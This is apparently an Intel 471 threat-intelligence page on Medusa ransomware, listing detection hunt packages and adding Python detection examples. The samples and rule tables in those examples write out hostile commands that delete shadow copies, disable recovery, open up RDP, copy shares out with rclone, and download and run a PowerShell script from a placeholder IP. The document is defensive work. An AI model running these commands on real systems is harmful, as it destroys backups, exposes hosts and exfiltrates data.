Update: Medusa Ransomware | Intel 471

Update: Medusa Ransomware

Mar 26, 2025

Threat Overview - Medusa Ransomware

UPDATE 03/25/2025: Since June 2021, Medusa ransomware, operating as a ransomware-as-a-service (RaaS), has been confirmed to have compromised over 300 organizations across critical infrastructure sectors, including healthcare, education, legal, insurance, technology, and manufacturing. In March 2025, CISA released a Cybersecurity Advisory as part of its #StopRansomware effort, offering technical details identified through recent FBI investigations. The actors exploit unpatched vulnerabilities in public-facing applications and often work with initial access brokers to get into networks. They have been observed using living-off-the-land techniques, leveraging legitimate system tools such as PowerShell and Windows Management Instrumentation (WMI) for reconnaissance and lateral movement. Medusa affiliates deploy tools such as Mimikatz for credential harvesting and use software deployment utilities such as PDQ Deploy and PsExec to distribute the ransomware payload. As mentioned in the earlier release of this collection, the ransomware encrypts data using AES-256, appends the ".medusa" extension to affected files, and deletes volume shadow copies to inhibit system recovery. In conjunction with the CISA advisory, threat hunters at Intel 471 have updated the collection with additional Hunt Packages related to the following:

  • Installation (and use) of malicious tooling
  • Privilege escalation via adding users to privileged security groups
  • Manipulation of RDP-related settings to make a system more exposed

Prior Information: Medusa Ransomware is a variant believed to have emerged in June 2021 that has become increasingly prolific of late. While "Medusa" is a name shared by other ransomware, malware, and botnets, this family is distinct from its similarly named competitors (such as MedusaLocker). The operators claim to exfiltrate data from compromised organizations in order to carry out a "double-extortion attack": the threat actor not only encrypts compromised systems but also sells or publicly releases the exfiltrated data if the ransom is not paid. Medusa Ransomware appends a .MEDUSA file extension to the files it encrypts. Medusa Ransomware is considered an active threat and therefore poses a significant, present risk that should be assessed and prepared for.

Medusa Ransomware Hunt Package Collection

Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!

Related Hunt Packages

Rclone Activity - Potential Data Exfiltration

Rclone is a command-line tool used to manage (and potentially exfiltrate) files on cloud storage. A large number of ransomware cases have been uncovered in which Rclone was used to exfiltrate files from victim machines.


Excessive Process and Service Stop Attempts - Potential Malware Infection

Malware and ransomware often kill legitimate services that could detect their activity before executing their commands. This package is intended to identify excessive occurrences of a process killing services.


Enabling RDP Connections through Registry Modification

This content is designed to detect modification of the registry key that enables and disables Remote Desktop Protocol (RDP) connections (HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server; the fDenyTSConnections value, where 0 allows connections and 1 denies them). This type of activity has been seen in the use of the SmokedHam tool by UNC2465 and its affiliates. False positives can occur, since administrators legitimately modify these keys; baseline the modifying process and user for your environment.


Suspicious BITS Activity - ScriptBlock

This package identifies activity in PowerShell script block logging associated with BITS, either via bitsadmin.exe or via the BITS cmdlets and module in PowerShell.


Suspicious BITS Activity

This package identifies activity associated with BITS, either via bitsadmin.exe or via the BITS cmdlets and module in PowerShell.


Possible Delayed Execution in CommandLine Argument Using Ping.exe and Loopback Address

This content is designed to detect ping.exe being run with a high repeat count (-n) against a loopback address. Because each echo request waits roughly a second, this is sometimes used as a crude sleep to delay the rest of a chained command from executing.


SoftPerfect Network Scanner Write File Validation

This Threat Hunt package identifies the use of the SoftPerfect Network Scanner tool when it is leveraged to find shares that allow write access for the user account in use. For additional logging requirements, see the Deployment Steps within the tool queries.


Taskkill.exe executed multiple times in a short period

This hunt is designed to capture when taskkill.exe is used multiple times on a single endpoint or in the entire environment in a short period of time. This behavior has been observed in relation to ransomware and other malicious software or actors when they attempt to cover their tracks or to disable security software on a compromised machine.


Potential Exfiltration - Common Rclone Arguments

This will identify processes executed with common arguments associated with rclone activity used for exfiltration.
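As an added illustration (my example, not the Intel 471 package logic, which this page does not reproduce), here is how the idea behind the two Rclone packages can be expressed in Python: flag rclone by image name, but also by its argument fingerprint, so a renamed binary is still caught. The events, hostnames and command lines are constructed; the option names are real rclone flags, and the remote syntax (`name:path`, `:backend:path`) is rclone's own.

```python
import re

# Constructed process-creation events (not from the page or any real incident).
SAMPLE_EVENTS = [
    {"host": "FS01", "image": r"C:\Users\svc\AppData\Local\Temp\rclone.exe",
     "cmdline": (r'rclone.exe copy "\\FS01\Finance" mega:exfil --config C:\Users\svc\r.conf '
                 r'-q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12')},
    # Renamed binary: the image name gives nothing away, the arguments still do.
    {"host": "FS01", "image": r"C:\Windows\Temp\svchost.exe",
     "cmdline": (r'svchost.exe sync D:\Shares\HR :sftp:/upload --sftp-host 203.0.113.10 '
                 r'--sftp-user u --sftp-pass x --transfers 8 --bwlimit 20M')},
    {"host": "WS22", "image": r"C:\Program Files\rclone\rclone.exe",
     "cmdline": "rclone.exe version"},
    {"host": "WS22", "image": r"C:\Windows\System32\robocopy.exe",
     "cmdline": r"robocopy.exe D:\data E:\backup /MIR /R:1"},
]

TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# Real rclone options that show up in exfiltration jobs (global flags and sftp backend flags).
RCLONE_FLAGS = {"--config", "--transfers", "--ignore-existing", "--auto-confirm",
                "--multi-thread-streams", "--bwlimit", "--no-check-certificate",
                "--sftp-host", "--sftp-user", "--sftp-pass", "-q", "--quiet", "-p", "--progress"}
# rclone remotes look like "name:path" or, on the fly, ":backend:path"; a single letter
# followed by ":\" is a Windows drive and is excluded by the length and lookahead rules.
REMOTE_RE = re.compile(r'(?:^|\s)(?::[A-Za-z0-9_-]+:|[A-Za-z0-9_-]{2,}:)(?!\\)')


def detect_rclone(event):
    """Return a finding dict for rclone-like exfiltration, or None."""
    tokens = event["cmdline"].split()
    args = tokens[1:]
    verb = args[0].lower() if args else ""
    flags = {t.split("=", 1)[0].lower() for t in args if t.startswith("-")}
    hits = flags & RCLONE_FLAGS
    has_remote = REMOTE_RE.search(event["cmdline"]) is not None
    named_rclone = event["image"].lower().endswith("\\rclone.exe")
    reasons = []
    if named_rclone and verb in TRANSFER_VERBS:
        reasons.append("rclone.exe %s" % verb)
    # Renamed or not: a transfer verb, a remote target and two or more rclone-only options.
    if verb in TRANSFER_VERBS and has_remote and len(hits) >= 2:
        reasons.append("rclone-style arguments: " + ", ".join(sorted(hits)))
    if not reasons:
        return None
    return {"host": event["host"], "image": event["image"], "reasons": reasons}


def hunt_rclone(events):
    """Apply detect_rclone to a batch of events and keep the findings."""
    return [f for f in (detect_rclone(e) for e in events) if f]


if __name__ == "__main__":
    for finding in hunt_rclone(SAMPLE_EVENTS):
        print(finding["host"], finding["image"], finding["reasons"])
```

Arguments beat image names here: renaming rclone.exe is routine, but a transfer verb plus a remote plus two or more rclone-specific options is hard to hide. Keep the flag list tuned to what you actually see; `--config` pointing into a user profile or a temp directory is usually the most telling single indicator.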


UAC Bypass Attempt via Elevated COM Abuse

This content is designed to detect User Account Control bypass attempts abusing common COM interfaces listed under the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\UAC\COMAutoApprovalList. These COM objects are designed to start at a higher integrity level and can be manipulated to open another process at that same higher level.


UAC Bypass Method - Cmstplua COM (Process Execution)

This content is designed to detect this UAC bypass method when it is executed via DllHost.exe or CMSTP.exe.


Disabling Windows Security Services via Registry Edit Methods

This hunt package is designed to identify any attempt to disable Windows security services through the modification of the Windows registry. Windows security services are crucial to maintaining the security of a system and disabling them could potentially compromise the system's security posture, allowing an attacker to run code without security protections in place.


CertUtil file download

Identify suspicious downloads with the built-in Windows tool CertUtil. CertUtil is not normally used to download executables, or files in general, from the web, so its use to download files from the Internet should be considered suspicious.


Excessive Windows Discovery and Execution Processes - Potential Malware Installation

This package uses a list of commonly abused LOLBins (living-off-the-land binaries) that an attacker or malware would execute in quick succession. Multiple executions of programs from the list can indicate an infection or malicious activity on a victim host. To reduce false positives, use a distinct count per process name, so that the rule requires more than 5 unique processes from the list rather than simply more than 6 events on the host.
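The excessive-service-stop, repeated-taskkill.exe and discovery-burst packages above share one mechanic: a per-host count inside a sliding time window. As an added example, not the packages' own query logic, the Python below implements that mechanic once and shows why the distinct-process count recommended above matters. Events, hostnames, timestamps and the LOLBin list are constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Discovery binaries commonly run back-to-back after a foothold (hypothetical list for
# the example; tune it to your own LOLBin inventory).
DISCOVERY_LOLBINS = {"whoami.exe", "net.exe", "net1.exe", "nltest.exe", "systeminfo.exe",
                     "ipconfig.exe", "netstat.exe", "tasklist.exe", "arp.exe", "route.exe",
                     "quser.exe", "nslookup.exe", "wmic.exe"}

T0 = datetime(2025, 3, 1, 9, 0, 0)


def ev(offset_s, host, image):
    return {"ts": T0 + timedelta(seconds=offset_s), "host": host, "image": image}


# Constructed process-creation events (not from the page or any real incident).
SAMPLE_EVENTS = (
    [ev(t, "HOST-A", "taskkill.exe") for t in (0, 3, 6, 9, 12, 15)]      # burst: 6 kills in 15 s
    + [ev(t, "HOST-B", "taskkill.exe") for t in (0, 3600)]               # admin: 2 kills an hour apart
    + [ev(100 + 10 * i, "HOST-A", img) for i, img in enumerate(        # 7 distinct LOLBins in 60 s
        ["whoami.exe", "net.exe", "nltest.exe", "systeminfo.exe",
         "ipconfig.exe", "netstat.exe", "arp.exe"])]
    + [ev(200 + i, "HOST-C", "whoami.exe") for i in range(8)]            # 8 events, but 1 binary
)


def sliding_window_hits(events, match, measure, window_s, threshold):
    """Per host, slide a window of window_s seconds over the events accepted by
    match(); report the first moment measure(window) reaches threshold."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if match(e):
            by_host[e["host"]].append(e)
    hits = []
    for host, evs in by_host.items():
        win = deque()
        for e in evs:
            win.append(e)
            while e["ts"] - win[0]["ts"] > timedelta(seconds=window_s):
                win.popleft()
            value = measure(win)
            if value >= threshold:
                hits.append({"host": host, "start": win[0]["ts"], "end": e["ts"], "value": value})
                break
    return hits


def is_taskkill(e):
    return e["image"].lower() == "taskkill.exe"


def is_discovery(e):
    return e["image"].lower() in DISCOVERY_LOLBINS


def excessive_taskkill(events, window_s=60, threshold=5):
    """Five or more taskkill.exe launches on one host inside a minute."""
    return sliding_window_hits(events, is_taskkill, len, window_s, threshold)


def discovery_burst_naive(events, window_s=300, threshold=6):
    """Raw event count: also fires on HOST-C, which merely ran whoami eight times."""
    return sliding_window_hits(events, is_discovery, len, window_s, threshold)


def discovery_burst(events, window_s=300, min_distinct=5):
    """Distinct-process count, as the package recommends: HOST-C no longer fires."""
    distinct = lambda win: len({e["image"].lower() for e in win})
    return sliding_window_hits(events, is_discovery, distinct, window_s, min_distinct)


if __name__ == "__main__":
    for name, fn in [("taskkill", excessive_taskkill),
                     ("discovery (naive count)", discovery_burst_naive),
                     ("discovery (distinct count)", discovery_burst)]:
        print(name, [(h["host"], h["value"]) for h in fn(SAMPLE_EVENTS)])
```

The same helper serves both rules; only the predicate and the measure change. In a SIEM the equivalent is a time-bucketed aggregation with `dc(process_name)` rather than `count()`, which is exactly the false-positive reduction the package describes.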


Attempted Backup Deletion - Potential Ransomware Activity

This Hunt Package focuses on identifying commands associated with the deletion of backups, which is common activity among various ransomware groups. The provided hunt logic will identify processes that run commands associated with backup deletion and provide relevant context around the activity.


Volume Shadow Copy Service Disabled

This package is designed to capture the surrounding activity when the Volume Shadow Copy Service (VSS) is disabled.


Advanced IP Scanner Tool Utilization

This Threat Hunt package identifies instances where the Advanced IP Scanner tool was used within a target environment; malicious actors may leverage it for network discovery. The package can also identify the activity when the tool is run as a portable executable rather than from an installation.


RDP Enabled Via NETSH

This hunt package is designed to capture the activity surrounding command-line arguments executed in order to enable Remote Desktop Protocol (RDP) through netsh.
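As an added example (not the Intel 471 query logic), the following Python classifies the RDP-enabling events covered by the two RDP packages above: the registry route (fDenyTSConnections set to 0, and the companion WinStations\RDP-Tcp\UserAuthentication value set to 0, which disables Network Level Authentication), the same change made through reg.exe, and the firewall route through netsh. The Sysmon-style events are constructed; the value names, paths and netsh syntax are Windows' own.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style telemetry (Event ID 13 registry value set, Event ID 1 process
# creation). Hostnames, images and command lines are made up for the example.
SAMPLE_EVENTS = [
    {"type": "registry", "host": "WS01", "image": r"C:\Windows\regedit.exe",
     "target": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000000)"},
    {"type": "registry", "host": "WS01", "image": r"C:\Windows\System32\reg.exe",
     "target": r"HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\UserAuthentication",
     "details": "DWORD (0x00000000)"},
    {"type": "registry", "host": "WS02", "image": r"C:\Windows\System32\svchost.exe",
     "target": r"HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "details": "DWORD (0x00000001)"},   # RDP being denied: not interesting
    {"type": "process", "host": "WS03", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"type": "process", "host": "WS03", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {"type": "process", "host": "WS04", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall show allprofiles"},
]

FDENY_VALUE = r"\control\terminal server\fdenytsconnections"
NLA_VALUE = r"\control\terminal server\winstations\rdp-tcp\userauthentication"
DWORD_RE = re.compile(r"dword\s*\(0x([0-9a-f]+)\)")
REG_ADD_FDENY = re.compile(
    r"reg(?:\.exe)?\s+add\s+.*terminal server.*?/v\s+fdenytsconnections\b.*?/d\s+0+(?!\d)")
# Modern (advfirewall) and legacy (firewall) netsh syntax for opening the RDP port.
NETSH_RDP = re.compile(
    r'netsh(?:\.exe)?\s+(?:advfirewall\s+firewall\s+set\s+rule\s+group="?remote desktop"?\s+new\s+enable=yes'
    r"|firewall\s+set\s+service\s+.*remotedesktop.*enable)")


def norm(s):
    return " ".join(s.split()).lower()


def dword(details):
    m = DWORD_RE.search(details.lower())
    return int(m.group(1), 16) if m else None


def classify(event):
    """Return why this event indicates RDP being opened up, or None."""
    if event["type"] == "registry":
        t = event["target"].lower()
        if t.endswith(FDENY_VALUE) and dword(event["details"]) == 0:
            return "RDP connections allowed (fDenyTSConnections=0)"
        if t.endswith(NLA_VALUE) and dword(event["details"]) == 0:
            return "Network Level Authentication disabled (UserAuthentication=0)"
    elif event["type"] == "process":
        c = norm(event["cmdline"])
        if REG_ADD_FDENY.search(c):
            return "RDP connections allowed via reg.exe"
        if NETSH_RDP.search(c):
            return "RDP firewall rule group enabled via netsh"
    return None


def hunt(events):
    return [{"host": e["host"], "image": e["image"], "reason": r}
            for e in events for r in [classify(e)] if r]


def hosts_by_confidence(events):
    """Hosts with two or more distinct RDP-enabling actions deserve the first look."""
    reasons = defaultdict(set)
    for f in hunt(events):
        reasons[f["host"]].add(f["reason"])
    return sorted(h for h, rs in reasons.items() if len(rs) >= 2)


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["host"], f["image"], f["reason"])
    print("review first:", hosts_by_confidence(SAMPLE_EVENTS))
```

The modifying image is the main false-positive handle: svchost.exe writing fDenyTSConnections is typically Group Policy applying a setting, whereas regedit.exe, reg.exe or a PowerShell host doing it on a server at 03:00 is worth a ticket. Correlating the registry change with a netsh firewall change on the same host, as hosts_by_confidence does, is what separates a deliberate "open RDP" step from routine administration.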


Resize Shadow Storage with 'vssadmin'

This will identify vssadmin being used to resize shadow storage. Shrinking the maximum shadow storage forces Windows to purge existing shadow copies, a method a few ransomware actors use to improve their odds of impacting recovery.


User Added to Default Privileged Windows Security Groups

This package is designed to capture the activity surrounding the execution of command line arguments that add a user to default privileged Windows Security Groups (local and domain).


Suspicious bcdedit Activity - Potential Ransomware

BCDEdit is a command-line tool for managing Boot Configuration Data (BCD). Ransomware is known to utilize bcdedit to modify the boot configuration to prevent recovery. The intent of this package is to identify when bcdedit is being utilized with several common malicious commands, such as delete and safeboot.


Shadow Copies Deletion Using Operating Systems Utilities

Ransomware is known to delete Windows shadow copies before it begins encrypting the data on the victim host. This tactic is typically carried out with PowerShell, vssadmin or wmic. This package identifies activity by powershell, wmic, vssadmin or vssvc with command-line arguments containing "delete" and variations of "shadow".
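The backup-deletion, VSS-disable, shadow-storage-resize, bcdedit and shadow-copy-deletion packages above all key on command lines. As an added example, not the packages' own logic, the Python below applies one rule table to a set of constructed command lines, including benign vssadmin, bcdedit and WMI inventory commands that must not fire. The command syntax is the real syntax of the Windows utilities.

```python
import re

# (label, regex) pairs applied to a lower-cased, whitespace-collapsed command line.
RULES = [
    ("shadow copy deletion (vssadmin)", r"vssadmin(?:\.exe)?\s+delete\s+shadows"),
    ("shadow copy deletion (wmic)", r"wmic(?:\.exe)?\s+shadowcopy\s+delete"),
    ("shadow copy deletion (PowerShell WMI/CIM)",
     r"win32_shadowcopy.*?(?:\.delete\(\)|remove-(?:wmiobject|ciminstance))"),
    ("shadow storage resize (vssadmin)", r"vssadmin(?:\.exe)?\s+resize\s+shadowstorage\b.*?/maxsize="),
    ("VSS service disabled",
     r"(?:sc(?:\.exe)?\s+config\s+vss\s+start=\s*disabled|net1?(?:\.exe)?\s+stop\s+vss\b)"),
    ("backup catalog deletion (wbadmin)", r"wbadmin(?:\.exe)?\s+delete\s+(?:catalog|systemstatebackup|backup)"),
    ("boot recovery disabled (bcdedit)",
     r"bcdedit(?:\.exe)?\s+/set\s+.*?(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    ("safe boot manipulation (bcdedit)",
     r"bcdedit(?:\.exe)?\s+(?:/set\s+.*?safeboot\s+(?:minimal|network)|/deletevalue\s+.*?safeboot)"),
    # Catch-all for "delete" plus any variation of "shadow", in either order.
    ("generic delete + shadow", r"delete.*shadow|shadow.*delete"),
]
COMPILED = [(label, re.compile(rx)) for label, rx in RULES]

# Constructed command lines (not taken from the page or a real incident).
SAMPLE_CMDLINES = [
    r"vssadmin.exe Delete Shadows /All /Quiet",
    r"wmic.exe shadowcopy delete /nointeractive",
    r'powershell.exe -c "Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"',
    r"vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB",
    r"bcdedit.exe /set {default} recoveryenabled No",
    r"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures",
    r"wbadmin.exe delete catalog -quiet",
    r"sc.exe config VSS start= disabled",
    # Benign inventory commands that an admin or a backup agent runs routinely.
    r"vssadmin.exe list shadows",
    r"bcdedit.exe /enum",
    r'powershell.exe -c "Get-WmiObject Win32_ShadowCopy | Select-Object ID, InstallDate"',
]


def norm(cmdline):
    return " ".join(cmdline.split()).lower()


def match_rules(cmdline):
    """Labels of every rule that fires on this command line (empty if benign)."""
    c = norm(cmdline)
    return [label for label, rx in COMPILED if rx.search(c)]


def hunt(cmdlines):
    """Keep only command lines that fired at least one rule, with their labels."""
    return [(c, labels) for c in cmdlines for labels in [match_rules(c)] if labels]


if __name__ == "__main__":
    for cmd, labels in hunt(SAMPLE_CMDLINES):
        print(labels, "<-", cmd)
```

Normalising case and whitespace before matching matters more than it looks: `Delete Shadows`, `delete  shadows` and `DELETE SHADOWS` are all accepted by vssadmin, and actors know detection rules are often case-sensitive. The generic rule at the end is deliberately loose and exists to catch spellings the specific rules miss; review its hits separately rather than alerting on them outright.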


Common Ransomware Encrypted File Extensions

Ransomware commonly changes the file extensions of the files it encrypts. The most common ransomware-linked file extensions can be identified and help associate the activity with a particular variant.


Powershell Encoded Command Execution

Looks for valid variations of the -EncodedCommand parameter. This parameter is commonly used to encode or obfuscate commands, and not all occurrences are malicious; for example, benign but complex commands may require encoding to run properly on a target system. Analysis of the payload by base64-decoding it (the result is UTF-16LE text) will be necessary.
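As an added example (not from the page), the Python below does the analysis step this package describes: find any accepted spelling of -EncodedCommand, base64-decode the payload as UTF-16LE, and keep peeling when the decoded script is itself another encoded PowerShell invocation. The sample command lines are constructed; the encoder is included so the example is self-contained.

```python
import base64
import binascii

# Every prefix of "EncodedCommand" that powershell.exe accepts as the parameter name,
# plus the documented short form -ec; the switch may be written with "-" or "/".
ENC_ALIASES = {"ec"} | {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)}
MAX_DEPTH = 5   # stop peeling nested encodings eventually


def encode_ps(script):
    """Produce a payload the way -EncodedCommand expects it: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob):
    """Decode one payload; None if it is not valid base64 or not valid UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def extract_encoded_layers(cmdline):
    """Return the decoded scripts, outermost first; empty if nothing decodes."""
    layers, current = [], cmdline
    for _ in range(MAX_DEPTH):
        tokens = current.split()
        decoded = None
        for i, tok in enumerate(tokens[:-1]):
            if tok[:1] in ("-", "/") and tok[1:].lower() in ENC_ALIASES:
                decoded = decode_ps(tokens[i + 1])
                if decoded is not None:
                    break
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded       # the decoded script may itself launch an encoded one
    return layers


# Strings worth a second look in a decoded script (a starting list, not a verdict).
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
              "frombase64string", "-nop", "bypass", "hidden", "net.webclient")


def suspicious_markers(script):
    s = script.lower()
    return sorted(m for m in SUSPICIOUS if m in s)


# Constructed samples: the address is from the TEST-NET-3 documentation range, not a real host.
INNER = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.5/p.ps1")'
MIDDLE = "powershell.exe -nop -w hidden -e " + encode_ps(INNER)
OUTER = "powershell.exe -NoProfile -EncodedCommand " + encode_ps(MIDDLE)
BENIGN = r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"

if __name__ == "__main__":
    for depth, script in enumerate(extract_encoded_layers(OUTER)):
        print("layer", depth, suspicious_markers(script), script[:70])
    print("benign:", extract_encoded_layers(BENIGN))
```

Two details trip up home-grown decoders: the payload is UTF-16LE, so decoding it as UTF-8 yields interleaved NUL bytes, and `-e` alone is a legal spelling, so a rule that only matches `-enc` or `-EncodedCommand` misses the most common abbreviation. Nested layers are common in stagers, which is why the loop re-scans each decoded script.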


Windows Defender Tampering - Possible Malware Activity

This package is designed to identify when PowerShell is utilized to tamper with Windows Defender in a way that would make a machine easier to compromise.
